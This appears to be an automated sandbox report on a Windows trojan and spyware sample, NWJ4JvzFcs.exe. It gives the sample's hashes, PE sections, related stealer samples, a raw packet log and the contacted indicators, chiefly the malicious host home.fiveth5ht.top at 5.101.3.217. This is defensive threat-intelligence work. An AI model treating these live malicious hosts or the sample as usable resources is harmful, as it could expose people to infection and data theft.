http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17 | NWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmp | false | | high
http://html4/loose.dtd | NWJ4JvzFcs.exe, 00000004.00000003.1300302903.0000000007BD0000.00000004.00001000.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmp | false | | high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF173518686235a1 | NWJ4JvzFcs.exe, 00000004.00000003.1435430653.0000000002037000.00000004.00000020.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000002.1439854052.0000000002039000.00000004.00000020.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000003.1435386630.0000000002033000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://httpbin.org/ipbefore | NWJ4JvzFcs.exe, 00000004.00000003.1300302903.0000000007BD0000.00000004.00001000.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmp | false | | high
https://curl.se/docs/http-cookies.html | NWJ4JvzFcs.exe, NWJ4JvzFcs.exe, 00000004.00000003.1300302903.0000000007BD0000.00000004.00001000.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmp | false | | high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS | NWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmp | false | | high
https://curl.se/docs/alt-svc.html | NWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmp | false | | high
http://.css | NWJ4JvzFcs.exe, 00000004.00000003.1300302903.0000000007BD0000.00000004.00001000.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmp | false | | high
http://.jpg | NWJ4JvzFcs.exe, 00000004.00000003.1300302903.0000000007BD0000.00000004.00001000.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmp | false | | high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862lse | NWJ4JvzFcs.exe, 00000004.00000003.1435430653.0000000002037000.00000004.00000020.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000002.1439854052.0000000002039000.00000004.00000020.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000003.1435386630.0000000002033000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown

IP | Domain | Country | ASN | ASN Name | Malicious
5.101.3.217 | home.fiveth5ht.top | Russian Federation | 34665 | PINDC-ASRU | false
3.218.7.103 | httpbin.org | United States | 14618 | AMAZON-AESUS | false

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1581253
Start date and time: 2024-12-27 09:06:55 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 50s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: NWJ4JvzFcs.exe
renamed because original name is a hash value
Original Sample Name: 91d22c615a675708fad7ddb68a64cf3f.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@8/2
EGA Information:
• Successful, ratio: 100%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
No simulations
                                                home.fiveth5ht.topEwhnoHx0n5.exeGet hashmaliciousUnknownBrowse
                                                • 5.101.3.217
                                                PqHnYMj5eF.exeGet hashmaliciousUnknownBrowse
                                                • 5.101.3.217
                                                qZA8AyGxiA.exeGet hashmaliciousUnknownBrowse
                                                • 5.101.3.217
                                                4o4t8dO4r1.exeGet hashmaliciousUnknownBrowse
                                                • 5.101.3.217
                                                xXe4fTmV2h.exeGet hashmaliciousUnknownBrowse
                                                • 5.101.3.217
                                                lolvgcpX19.exeGet hashmaliciousUnknownBrowse
                                                • 5.101.3.217
                                                w6cYYyWXqJ.exeGet hashmaliciousUnknownBrowse
                                                • 5.101.3.217
                                                mBr65h6L4w.exeGet hashmaliciousUnknownBrowse
                                                • 5.101.3.217
                                                HrIrtCXI3s.exeGet hashmaliciousUnknownBrowse
                                                • 5.101.3.217
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                PINDC-ASRUEwhnoHx0n5.exeGet hashmaliciousUnknownBrowse
                                                • 5.101.3.217
                                                PqHnYMj5eF.exeGet hashmaliciousUnknownBrowse
                                                • 5.101.3.217
                                                qZA8AyGxiA.exeGet hashmaliciousUnknownBrowse
                                                • 5.101.3.217
                                                4o4t8dO4r1.exeGet hashmaliciousUnknownBrowse
                                                • 5.101.3.217
                                                xXe4fTmV2h.exeGet hashmaliciousUnknownBrowse
                                                • 5.101.3.217
                                                lolvgcpX19.exeGet hashmaliciousUnknownBrowse
                                                • 5.101.3.217
                                                w6cYYyWXqJ.exeGet hashmaliciousUnknownBrowse
                                                • 5.101.3.217
                                                mBr65h6L4w.exeGet hashmaliciousUnknownBrowse
                                                • 5.101.3.217
                                                HrIrtCXI3s.exeGet hashmaliciousUnknownBrowse
                                                • 5.101.3.217
                                                6ufJvua5w2.exeGet hashmaliciousCryptOne, Stealc, VidarBrowse
                                                • 91.215.85.11
                                                AMAZON-AESUSEwhnoHx0n5.exeGet hashmaliciousUnknownBrowse
                                                • 3.218.7.103
                                                PqHnYMj5eF.exeGet hashmaliciousUnknownBrowse
                                                • 3.218.7.103
                                                YrxiR3yCLm.exeGet hashmaliciousLummaCBrowse
                                                • 3.218.7.103
                                                qZA8AyGxiA.exeGet hashmaliciousUnknownBrowse
                                                • 3.218.7.103
                                                Cph7VEeu1r.exeGet hashmaliciousLummaCBrowse
                                                • 3.218.7.103
                                                3stIhG821a.exeGet hashmaliciousLummaCBrowse
                                                • 34.226.108.155
                                                DRWgoZo325.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, VidarBrowse
                                                • 3.218.7.103
                                                4o4t8dO4r1.exeGet hashmaliciousUnknownBrowse
                                                • 34.226.108.155
                                                xXe4fTmV2h.exeGet hashmaliciousUnknownBrowse
                                                • 3.218.7.103
                                                lolvgcpX19.exeGet hashmaliciousUnknownBrowse
                                                • 3.218.7.103
                                                No context
                                                No context
                                                No created / dropped files found
File type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit): 7.9870103481329435
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• VXD Driver (31/22) 0.00%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: NWJ4JvzFcs.exe
File size: 4'522'496 bytes
MD5: 91d22c615a675708fad7ddb68a64cf3f
SHA1: 3f83a7beba10482293899728cd505775f250c25f
SHA256: 71bee394da6e85dbc2b1d660dd215346a3a957cf2aba4ab3d505a84f7fb12798
SHA512: fc286048549ae455f7379eb622a3b923d0218c9393a6f12b1964e027ffa154514a626aeb67a5cb3d85bc41edca9f0e689b352bcc268e6aa6a80f375944f16656
SSDEEP: 98304:amOieu7Ainw0RHGRsjjE7oi/9NDm9JV/8nF8XV+TteZ:amOieIAiFmRsjjMomNDBnbhe
TLSH: 732633901E8E99B3C256DD7D621340A2AC898FBB1B513A84AD817F24CE17DF439F7C85
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._.lg...............(..I...p..2...@....... I...@..........................p........E...@... ............................
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x1044000
Entrypoint Section: .taggant
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics: DYNAMIC_BASE
Time Stamp: 0x676CDB5F [Thu Dec 26 04:28:15 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6dd05f | 0x73 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6dc000 | 0x1ac | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x708a00 | 0x688 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc42a1c | 0x10 | vsycrkux
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xc429cc | 0x18 | vsycrkux
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
 | 0x1000 | 0x6db000 | 0x288a00 | 729a1eb378b34cecf7a7b2cd10b448ae | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x6dc000 | 0x1ac | 0x200 | 8b188f591ece67696883250e1acbd3ec | False | 0.576171875 | data | 4.547679736252066 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x6dd000 | 0x1000 | 0x200 | 6363462e4ea156e03144265f6be7871e | False | 0.166015625 | data | 1.1763897754724144 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
 | 0x6de000 | 0x3a1000 | 0x200 | 58b368de4895dd625296705373e35eb6 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
vsycrkux | 0xa7f000 | 0x1c4000 | 0x1c3c00 | abd7b82766c3617286378adc4fe2ca6c | False | 0.994511902497233 | data | 7.955164567057714 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
rssptqyp | 0xc43000 | 0x1000 | 0x400 | 12eda4f632be7dc25192e15b75b40458 | False | 0.7333984375 | data | 5.907051038652854 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0xc44000 | 0x3000 | 0x2200 | 9ebcb01e9b1c9d4871a78ce88d21be56 | False | 0.06330422794117647 | DOS executable (COM) | 0.7531318352972309 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0xc42a2c | 0x152 | ASCII text, with CRLF line terminators |  |  | 0.6479289940828402

DLL | Import
kernel32.dll | lstrcpy
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                    Dec 27, 2024 09:07:57.685636997 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.685728073 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.685857058 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.685866117 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.685934067 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.686078072 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.686135054 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.686244011 CET4971680192.168.2.105.101.3.217
                                                    Dec 27, 2024 09:07:57.686328888 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.686338902 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.686395884 CET4971680192.168.2.105.101.3.217
                                                    Dec 27, 2024 09:07:57.686491966 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.686541080 CET4971680192.168.2.105.101.3.217
                                                    Dec 27, 2024 09:07:57.686547041 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.686593056 CET4971680192.168.2.105.101.3.217
                                                    Dec 27, 2024 09:07:57.686752081 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.686795950 CET4971680192.168.2.105.101.3.217
                                                    Dec 27, 2024 09:07:57.686813116 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.686872005 CET4971680192.168.2.105.101.3.217
                                                    Dec 27, 2024 09:07:57.708244085 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.708314896 CET4971680192.168.2.105.101.3.217
                                                    Dec 27, 2024 09:07:57.751878023 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.752019882 CET4971680192.168.2.105.101.3.217
                                                    Dec 27, 2024 09:07:57.804541111 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.804651022 CET4971680192.168.2.105.101.3.217
                                                    Dec 27, 2024 09:07:57.804663897 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.804719925 CET4971680192.168.2.105.101.3.217
                                                    Dec 27, 2024 09:07:57.804728985 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.804831028 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.804902077 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.804999113 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.805126905 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.805140972 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.805241108 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.805315971 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.805449009 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.805458069 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.805505991 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.805654049 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.805664062 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.805674076 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.805834055 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.805844069 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.805857897 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.805922031 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.805953026 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.806071043 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.806080103 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.806152105 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.806181908 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.806211948 CET4971680192.168.2.105.101.3.217
                                                    Dec 27, 2024 09:07:57.806246996 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.806271076 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.806341887 CET4971680192.168.2.105.101.3.217
                                                    Dec 27, 2024 09:07:57.806375980 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.806385994 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.806430101 CET4971680192.168.2.105.101.3.217
                                                    Dec 27, 2024 09:07:57.806485891 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.806493998 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.806526899 CET4971680192.168.2.105.101.3.217
                                                    Dec 27, 2024 09:07:57.806690931 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.806700945 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.806709051 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.806718111 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.806837082 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.806845903 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.806967020 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.806974888 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.807069063 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.807077885 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.807179928 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.807188988 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.807291031 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.807300091 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.807387114 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.807395935 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.807465076 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.807495117 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.807585001 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.807594061 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.807703018 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.807712078 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.807816982 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.807826042 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.807929039 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.807939053 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.808011055 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.808033943 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.808125019 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.808159113 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.808216095 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.808286905 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.808371067 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.827797890 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.827928066 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.871695995 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.924376011 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.924418926 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.924429893 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.924438953 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.925218105 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.925622940 CET4971680192.168.2.105.101.3.217
                                                    Dec 27, 2024 09:07:57.925709963 CET4971680192.168.2.105.101.3.217
                                                    Dec 27, 2024 09:07:57.925790071 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.925803900 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.925853014 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.925997019 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.926007032 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.926074982 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.926084995 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.926148891 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.926156998 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.926291943 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.926301003 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.926502943 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.926512003 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.926632881 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.926642895 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.926779985 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.926804066 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.926924944 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.926934004 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.926996946 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.927006006 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.927082062 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.927092075 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.927175999 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.927185059 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.927249908 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.927273035 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.927388906 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.927397966 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.927547932 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.927556992 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.927567005 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.927607059 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.927661896 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.927671909 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.927728891 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.927757025 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.927807093 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.927815914 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.927885056 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.927911043 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.927978992 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.927994967 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.928036928 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.928046942 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.928126097 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.928136110 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.928205013 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.928214073 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.928316116 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.928325891 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.928384066 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.928392887 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.928401947 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:57.928713083 CET4971680192.168.2.105.101.3.217
                                                    Dec 27, 2024 09:07:57.928772926 CET4971680192.168.2.105.101.3.217
                                                    Dec 27, 2024 09:07:58.045281887 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.045305014 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.045397997 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.045416117 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.045578003 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.045588017 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.045629978 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.045648098 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.045756102 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.045766115 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.045876026 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.045891047 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.045977116 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.046019077 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.046030998 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.046073914 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.046128035 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.046137094 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.046237946 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.046298981 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.046359062 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.046369076 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.046452999 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.046463013 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.046564102 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.046574116 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.046601057 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.046760082 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.046901941 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.046911955 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.046921968 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.046931982 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:58.047003984 CET80497165.101.3.217192.168.2.10
